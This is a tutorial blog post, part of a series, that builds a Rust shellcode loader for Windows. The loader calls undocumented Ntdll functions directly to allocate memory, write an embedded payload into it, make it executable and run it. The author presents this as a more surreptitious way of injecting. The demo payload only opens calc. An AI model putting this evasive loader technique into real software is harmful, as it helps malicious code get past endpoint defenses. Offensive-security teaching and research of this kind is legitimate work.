Payload Injection on Windows Part III

Hello and welcome back! In our last post we explored how to write a safe(r) wrapper around the calls we needed from the Rust winapi crate. In this post, we will explore calling undocumented Ntdll functions in order to inject our payload a little more surreptitiously.

First, let's start by revisiting the Windows API. I mentioned in part one that the Windows API is a set of interfaces that are exposed to users to develop programs that interact with the operating system. To get a little more technical, these interfaces are broken down and exposed via several header files and Dynamic-Link Libraries, or DLLs. Breaking up the API into different header files and DLLs makes it easier to interact with only the parts of the API that you need. The Windows API is also structured in a way that abstracts some of the inner workings away from the user. For instance, let's take a look at VirtualAlloc. According to the Windows documentation, VirtualAlloc is defined in the memoryapi.h header file (included in windows.h), and exposed through Kernel32.dll. Now let's take a look at the function in a debugger.

virtual_alloc_dbg.png

Interesting. If you look at the function, you'll see a call to ZwAllocateVirtualMemory just a few lines in. But what is ZwAllocateVirtualMemory?

Well, ZwAllocateVirtualMemory is an API call that resides in Ntdll.dll. Microsoft has some documentation on ZwAllocateVirtualMemory here. From reading the documentation, it looks like ZwAllocateVirtualMemory is a function that can be used from user space or kernel space to allocate memory in a process.

So, when you call VirtualAlloc, VirtualAlloc packages up the appropriate arguments and then calls ZwAllocateVirtualMemory from Ntdll. However, it is possible to skip the call to VirtualAlloc and call the Ntdll functions directly, if you know the proper syntax.

The documentation also mentions that if you are calling this function from userland you should actually call NtAllocateVirtualMemory instead. Taking a look at the exports in Ntdll it actually looks like NtAllocateVirtualMemory and ZwAllocateVirtualMemory point to the same location. However, we'll listen to the documentation and call the function using NtAllocateVirtualMemory.

ntdll_exports.png

While ZwAllocateVirtualMemory has some documentation, not all Ntdll functions are (officially) documented. So why are there undocumented DLL functions? Well, because Microsoft doesn't really want you to use them. The idea is that you call VirtualAlloc from Kernel32.dll, which is documented, and then it gets everything ready and calls NtAllocateVirtualMemory from Ntdll.dll. That way, Microsoft can expose a well-documented API for allocating memory and, in case they need to change something, they can change the underlying functions in Ntdll and still keep the original API interface unchanged.

There is a project by Tomasz Nowak called ntinternals here that documents many of the undocumented Ntdll functions. We will use this documentation as a guide for the other Nt functions that we will need.

So, how do you go about calling functions if you can't compile against them?

Well, Windows allows you to dynamically load and unload libraries during program execution and call functions within those libraries. Windows provides the LoadLibrary and GetProcAddress functions for that purpose. Luckily for us, Ntdll is loaded into every Windows process, so we can use GetModuleHandle to get a handle to the library.

The process will look like the following: Get a handle to Ntdll using GetModuleHandle and then use GetProcAddress to obtain the address of the function that we want to call. Then, type-cast the address of the function to a function pointer with the same calling convention and arguments. Finally, just call the address as a regular function.
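To make those steps concrete without touching Windows yet, here is a minimal, portable sketch of the same pattern. Everything in it is a stand-in that I made up for illustration: `FakeModule` plays the role of a loaded library, `FakeModule::load` plays the role of GetModuleHandle, `get_proc_address` plays the role of GetProcAddress, and `add_numbers` is a pretend export. The only real point is the last step: an untyped address is cast to a function pointer with a matching calling convention and signature, and then called like any other function.

```rust
use std::collections::HashMap;
use std::ffi::c_void;

// Pretend "exported" function (hypothetical; not a real ntdll export).
extern "C" fn add_numbers(a: u32, b: u32) -> u32 {
    a + b
}

// Hypothetical stand-in for a loaded module: a table of export names and addresses.
struct FakeModule {
    exports: HashMap<&'static str, *const c_void>,
}

impl FakeModule {
    // Plays the role of GetModuleHandle: hands back the already "loaded" module.
    fn load() -> Self {
        let mut exports = HashMap::new();
        exports.insert("add_numbers", add_numbers as *const c_void);
        FakeModule { exports }
    }

    // Plays the role of GetProcAddress: look up an export by name.
    fn get_proc_address(&self, name: &str) -> Option<*const c_void> {
        self.exports.get(name).copied()
    }
}

fn call_add(module: &FakeModule, a: u32, b: u32) -> Option<u32> {
    let addr = module.get_proc_address("add_numbers")?;
    // Cast the untyped address to a function pointer with the same ABI and arguments.
    let func: extern "C" fn(u32, u32) -> u32 = unsafe { std::mem::transmute(addr) };
    // From here on it is called like a regular function.
    Some(func(a, b))
}

fn main() {
    let module = FakeModule::load();
    println!("{:?}", call_add(&module, 2, 3));
}
```

If the signature in the cast does not match the real function, nothing will stop you at compile time, which is why getting the types right matters so much in the rest of this post.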

Alright, with all of that out of the way, it's back to coding!

Let's create a new Rust project. I named mine winapi-ntdll, but I forgot to save the code of me creating the project so you're just going to have to believe me on this one.

Next we'll add the features that we need from winapi-rs to the Cargo.toml.

# Contents of Cargo.toml

[package]
name = "winapi-ntdll"
version = "0.1.0"
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
winapi = { version = "0.3", features = ["libloaderapi", "processthreadsapi"] }

Over in main.rs we'll need to use CString, which we'll get to in a minute, and we'll need a couple of functions from the libloaderapi.

GetModuleHandleA and GetProcAddress both take C strings as an argument, so we'll start off by creating C strings for ntdll and NtAllocateVirtualMemory. Next, we'll pass the first C string to GetModuleHandleA to get a handle to the Ntdll library that's loaded in our process. Then, we'll use our new handle to ntdll, along with the second C string, to get the address of the NtAllocateVirtualMemory function. After getting the address of NtAllocateVirtualMemory, we're going to drop the C strings that we generated, since we'll no longer need them.

// contents of main.rs
use std::ffi::CString;
use winapi::{
    um::{
        libloaderapi::{GetModuleHandleA, GetProcAddress},
    },
};

fn main() {
    // generate C string pointers for calls to GetModuleHandle and GetProcAddress
    let ntdll_name = CString::new("ntdll.dll").unwrap().into_raw();
    let proc_name = CString::new("NtAllocateVirtualMemory").unwrap().into_raw();

    let ntdll_handle = unsafe { GetModuleHandleA(ntdll_name) };
    let func = unsafe { GetProcAddress(ntdll_handle, proc_name) };
    // have rust retake the CString pointers to free the memory
    // see https://doc.rust-lang.org/std/ffi/struct.CString.html#method.into_raw
    unsafe {
        let _ = CString::from_raw(ntdll_name);
        let _ = CString::from_raw(proc_name);
    }
    println!("NTDLL handle: {:?}", ntdll_handle);
    println!("NtAllocateVirtualMemory address: {:?}", func);
}

The last two lines print out our newly acquired addresses, so let's give it a go.

D:\projects\rust\blog\win-api\winapi-ntdll>cargo run
   Compiling winapi-ntdll v0.1.0 (D:\projects\rust\blog\win-api\winapi-ntdll)
    Finished dev [unoptimized + debuginfo] target(s) in 0.74s
     Running `target\debug\winapi-ntdll.exe`
NTDLL handle: 0x7ffcc9990000
NtAllocateVirtualMemory address: 0x7ffcc9a2d060

D:\projects\rust\blog\win-api\winapi-ntdll>
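As a side note, the into_raw / from_raw round trip is not the only way to hand a C string to a foreign function. A possibly simpler option is to keep the CString alive in a local variable and pass `as_ptr()`, which lets Rust free the buffer on its own when the variable goes out of scope. The sketch below is portable and does not call the Windows API; `c_string_len` is a hypothetical stand-in for any function that expects a NUL-terminated string.

```rust
use std::ffi::{CStr, CString};
use std::os::raw::c_char;

// Hypothetical stand-in for a C API that reads a NUL-terminated string.
fn c_string_len(ptr: *const c_char) -> usize {
    // Safety: callers must pass a valid, NUL-terminated pointer.
    unsafe { CStr::from_ptr(ptr) }.to_bytes().len()
}

fn name_len(name: &str) -> usize {
    // The CString owns the buffer, which stays valid until `c_name` is dropped.
    let c_name = CString::new(name).expect("name must not contain interior NUL bytes");
    // Borrow the pointer for the duration of the call; no manual free is needed.
    c_string_len(c_name.as_ptr())
}

fn main() {
    println!("{}", name_len("ntdll.dll"));
}
```

The one thing to watch for with this approach is calling `as_ptr()` on a temporary, for example `CString::new("x").unwrap().as_ptr()`, because the buffer is freed at the end of that statement and the pointer dangles.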

Now we have an address to a function that has been loaded in memory. Before we can call this address as a function, we need to tell Rust how to call the function. That is, what kind of function it is, what kind of arguments it takes, and what kind of value it returns.

We can use the Windows documentation to get the return values and arguments that we need. Below I have copied and pasted the syntax from the Windows documentation and added comments for the Rust equivalents.

__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory( // extern "system" matches the Windows API calling convention (identical to extern "C" on x64); NTSTATUS is 32 bits, so we return u32
	[in] HANDLE ProcessHandle, // winapi PVOID (HANDLE is an alias for *mut c_void)
	[in, out] PVOID *BaseAddress, // winapi *mut PVOID
	[in] ULONG_PTR ZeroBits, // usize (ULONG_PTR is pointer-sized)
	[in, out] PSIZE_T RegionSize, // *mut usize
	[in] ULONG AllocationType,  // u32
	[in] ULONG Protect // u32
);

Now that we have the proper arguments, return values, and calling convention, we can use Rust's transmute function to turn the address into a function pointer.

let ntallocvmem = unsafe {
	std::mem::transmute::<
		*mut __some_function, // addresses returned from winapi-rs GetProcAddress are of type *mut __some_function
		unsafe extern "system" fn(PVOID, *mut PVOID, usize, *mut usize, u32, u32) -> u32,
	>(func)
};
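One caveat worth spelling out: GetProcAddress returns a null pointer when the lookup fails, and a plain Rust function pointer is never allowed to be null. A common way to guard against that is to transmute into an `Option` of the function pointer type instead, since Rust guarantees that `Option<fn>` has the same size as a pointer and that null maps to `None`. Here is a small, portable sketch of the idea; `AddFn`, `add`, and `to_fn` are names I invented for the example and have nothing to do with ntdll.

```rust
use std::ffi::c_void;

// Hypothetical function pointer type standing in for an Nt* signature.
type AddFn = unsafe extern "C" fn(u32, u32) -> u32;

// Hypothetical target function so we have a real address to work with.
unsafe extern "C" fn add(a: u32, b: u32) -> u32 {
    a + b
}

// Turn a possibly-null address into Some(function pointer) or None.
fn to_fn(addr: *mut c_void) -> Option<AddFn> {
    // Option<fn pointer> is pointer-sized and represents null as None,
    // so a failed lookup becomes None instead of an invalid function pointer.
    unsafe { std::mem::transmute::<*mut c_void, Option<AddFn>>(addr) }
}

fn main() {
    match to_fn(add as *mut c_void) {
        Some(f) => println!("result: {}", unsafe { f(2, 3) }),
        None => println!("lookup failed"),
    }
    println!("null lookup is none: {}", to_fn(std::ptr::null_mut()).is_none());
}
```

The same shape should work for the address returned by GetProcAddress, with the Option type spelled out using the real signature.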

Now we can set up the variables for our arguments and call the function.

The base address variable is going to take a bit of casting to get the proper type. We start with std::ptr::null_mut::<usize> and cast that as *mut usize, which we then cast again as *mut c_void. When we call the function we'll pass that by reference and cast the reference again to get our *mut *mut c_void. It's not particularly pretty, but it will work.

The rest of the arguments are pretty straightforward.

let handle = unsafe { GetCurrentProcess() }; // Get a handle to our process 
let mut base_address = std::ptr::null_mut::<usize>() as *mut usize as *mut c_void;
println!("Base_address address: {:?}", base_address);
let zerobits = 0;
let mut regionsize: usize = 1024;
println!("Calling function");
let out = unsafe {
	ntallocvmem(
		handle,
		&mut base_address as *mut *mut c_void, // the function is expecting PVOID * which translates to *mut *mut c_void
		zerobits,
		&mut regionsize,
		MEM_COMMIT | MEM_RESERVE,
		PAGE_READWRITE,
	)
};
if out == 0x00000000 {
	println!(
		"Successfully called NtAllocateVirtualMemory: BaseAddress: {:?}, RegionSize: {}",
		base_address, regionsize
	);
} else {
	println!("Error calling NtAllocateVirtualMemory: {:x}", out);
}
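Comparing against zero works here, but NTSTATUS is really a signed 32-bit value in which any non-negative code (success or informational) counts as success; that is what the NT_SUCCESS macro in the Windows headers checks. Below is a small sketch of a helper along those lines. The names `nt_success` and `check` are my own and are not part of winapi-rs.

```rust
// Mirrors the NT_SUCCESS macro: reinterpret the status as signed and test for >= 0.
fn nt_success(status: u32) -> bool {
    (status as i32) >= 0
}

// Hypothetical helper that turns a raw status into a Result with a readable message.
fn check(status: u32, what: &str) -> Result<(), String> {
    if nt_success(status) {
        Ok(())
    } else {
        Err(format!("{} failed with NTSTATUS {:#010x}", what, status))
    }
}

fn main() {
    // 0x00000000 is STATUS_SUCCESS, 0xC0000005 is STATUS_ACCESS_VIOLATION.
    println!("{:?}", check(0x0000_0000, "NtAllocateVirtualMemory"));
    println!("{:?}", check(0xC000_0005, "NtAllocateVirtualMemory"));
}
```

Returning a Result also makes it easy to bail out with `?` instead of carrying on after a failed call.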

Time to compile and test it out!

calling_ntallocate.png

Success! Looks like we were able to call the function in NTDLL successfully. If you're wondering why the region size says 4096 when we only asked for 1024 bytes, it's because Windows rounds the requested region size up to the next page boundary. Since a page is 4096 bytes, the request was rounded up to 4096.

Now we have to do the same for the other functions that we need: NtWriteVirtualMemory and NtProtectVirtualMemory.

Since the remaining functions aren't documented by Microsoft, we'll rely on the definitions in ntinternals.
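The rounding itself is simple arithmetic. Here is a quick sketch of it, assuming a 4096-byte page (the real value can be queried from the system, and `round_up_to_page` is just a name I picked for the example):

```rust
// Round `size` up to the next multiple of `page_size`.
// Assumes `page_size` is a power of two, which holds for the usual 4096-byte page.
fn round_up_to_page(size: usize, page_size: usize) -> usize {
    assert!(page_size.is_power_of_two());
    (size + page_size - 1) & !(page_size - 1)
}

fn main() {
    // Our 1024-byte request ends up occupying one full page.
    println!("{}", round_up_to_page(1024, 4096));
    // One byte over a page boundary costs a whole extra page.
    println!("{}", round_up_to_page(4097, 4096));
}
```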

First is NtWriteVirtualMemory. I've put the function definition from the ntinternals website below and added comments for the Rust types.

NTSYSAPI 
NTSTATUS // Again, we'll return u32 and use extern "system" (same as extern "C" on x64)
NTAPI

NtWriteVirtualMemory(
  IN HANDLE               ProcessHandle, // winapi-rs HANDLE
  IN PVOID                BaseAddress, // winapi-rs PVOID
  IN PVOID                Buffer, // winapi-rs PVOID
  IN ULONG                NumberOfBytesToWrite, // ULONG here, but pointer-sized (SIZE_T) on 64-bit Windows, so usize is the safe choice
  OUT PULONG              NumberOfBytesWritten OPTIONAL // PULONG here, but PSIZE_T on 64-bit Windows, so *mut usize is the safe choice
);

And then NtProtectVirtualMemory.

NTSYSAPI 
NTSTATUS // extern "system", returning u32
NTAPI

NtProtectVirtualMemory(
  IN HANDLE               ProcessHandle, // winapi-rs HANDLE
  IN OUT PVOID            *BaseAddress, // winapi-rs *mut PVOID  or *mut *mut c_void
  IN OUT PULONG           NumberOfBytesToProtect, // PULONG here, but PSIZE_T on 64-bit Windows, so *mut usize is the safe choice
  IN ULONG                NewAccessProtection, // u32
  OUT PULONG              OldAccessProtection  // &mut u32
);

The rest of the process is exactly the same as with NtAllocateVirtualMemory. We get the address of the function using GetProcAddress, transmute the address to the appropriate function pointer type, and then call the function.

You'll notice some changes to the code below. I've broken out the code that gets a handle to the module and looks up the addresses of functions within that module. I won't get into that code because there isn't really much to it, and in the previous blog post I went into detail on how to write wrappers around the Windows API. I also included a macro to handle transmuting the function to remove a little bit of boilerplate code. I just made a very slight modification to the macro found here. Finally, I added the anyhow crate to make handling errors a little nicer.
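To give a rough idea of what such a macro can look like, here is a minimal sketch. This is not the macro used in the project (that one lives in the winapi_ntdll crate alongside the Module wrapper); `cast_fn!` and `double_it` are hypothetical names, and the example casts the address of a local function so that it runs anywhere.

```rust
use std::ffi::c_void;

// Hypothetical helper macro: wraps std::mem::transmute so the call site only
// has to name the address and the target function pointer type.
macro_rules! cast_fn {
    ($addr:expr, $fn_type:ty) => {
        std::mem::transmute::<*const std::ffi::c_void, $fn_type>($addr)
    };
}

// Hypothetical target function standing in for a looked-up export.
extern "C" fn double_it(x: u32) -> u32 {
    x * 2
}

fn call_through_macro(x: u32) -> u32 {
    let addr = double_it as *const c_void;
    // The macro expands to a transmute, so it still needs an unsafe block.
    let f = unsafe { cast_fn!(addr, extern "C" fn(u32) -> u32) };
    f(x)
}

fn main() {
    println!("{}", call_through_macro(21));
}
```

The macro does not make the cast any safer; it only trims the repeated turbofish, so the signature you pass in still has to match the real function.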

// contents of main.rs
use anyhow::Result;
use std::convert::TryInto;
use winapi_ntdll::{
    win::Module,
    transmute,
};
use winapi::{
    ctypes::c_void,
    um::{
        processthreadsapi::GetCurrentProcess,
        winnt::{HANDLE, MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READ, PVOID},
    },
};

fn main() -> Result<()> {
    let payload = include_bytes!("w64-exec-calc.bin");
    let ntdll = Module::get("ntdll.dll")?;
    let ntavm_addr = ntdll.get_proc_address("NtAllocateVirtualMemory")?;

    println!("NtAllocateVirtualMemory address: {:?}", ntavm_addr);

    let nt_allocate_virtual_memory = unsafe {
        // ZeroBits is a ULONG_PTR, which is pointer-sized, so it maps to usize
        transmute!(ntavm_addr, unsafe extern "system" fn(PVOID, *mut PVOID, usize, *mut usize, u32, u32) -> u32)
    };
 
    let handle = unsafe { GetCurrentProcess() };
    let mut base_address = std::ptr::null_mut::<usize>() as *mut usize as *mut c_void;
    println!("Base_address address: {:?}", base_address);
    let zerobits = 0;
    let mut regionsize: usize = payload.len();
    let mut out = unsafe {
        nt_allocate_virtual_memory(
            handle,
            &mut base_address as *mut *mut c_void,
            zerobits,
            &mut regionsize,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_READWRITE,
        )
    };
    if out == 0x00000000 {
        println!(
            "Successfully called NtAllocateVirtualMemory: BaseAddress: {:?}, RegionSize: {}",
            base_address, regionsize
        );
    } else {
        println!("Error calling NtAllocateVirtualMemory: {:x}", out);
    }
    
    let ntwvm_addr = ntdll.get_proc_address("NtWriteVirtualMemory")?;
    let nt_write_virtual_memory = unsafe {
        // the size arguments are pointer-sized (SIZE_T) on 64-bit Windows, so use usize rather than u32
        transmute!(ntwvm_addr, unsafe extern "system" fn(HANDLE, PVOID, PVOID, usize, *mut usize) -> u32)
    };

    let mut bytes_written: usize = 0;
    out = unsafe {
        nt_write_virtual_memory(
            handle,
            base_address,
            payload.as_ptr() as *mut c_void,
            payload.len(),
            &mut bytes_written,
        )
    };
    if out == 0x00000000 {
        println!("Successfully called NtWriteVirtualMemory: bytes written: {}", bytes_written );
    } else {
        println!("Error calling NtWriteVirtualMemory: {:x}", out);
    }

    let ntpvm_addr = ntdll.get_proc_address("NtProtectVirtualMemory")?;
    let nt_protect_virtual_memory = unsafe {
        // the region size is read and written as a pointer-sized SIZE_T on 64-bit Windows
        transmute!(ntpvm_addr, unsafe extern "system" fn(HANDLE, *mut PVOID, *mut usize, u32, *mut u32) -> u32)
    };

    let mut payload_len: usize = payload.len();
    let mut old_protect: u32 = 0;

    out = unsafe {
        nt_protect_virtual_memory(
            handle,
            &mut base_address as *mut *mut c_void,
            &mut payload_len,
            PAGE_EXECUTE_READ,
            &mut old_protect,
        )
    };
    if out == 0x00000000 {
        println!("Successfully called NtProtectVirtualMemory");
    } else {
        println!("Error calling NtProtectVirtualMemory: {:x}", out);
    }
}

Now to test it out.

final.png

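All we have to do now is cast base_address to a function pointer and then call it! These lines go at the end of main, just before the closing brace, and the final Ok(()) gives main the return value it was missing in the listing above.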

    let func = unsafe { std::mem::transmute::<*mut c_void, fn()>(base_address)};
    println!("Calling shellcode!");
    func();
    Ok(())

winmem-ntdll.gif

Thanks for reading! Check in next time when we embed the syscalls from ntdll.dll directly into our binary using the SysWhispers project.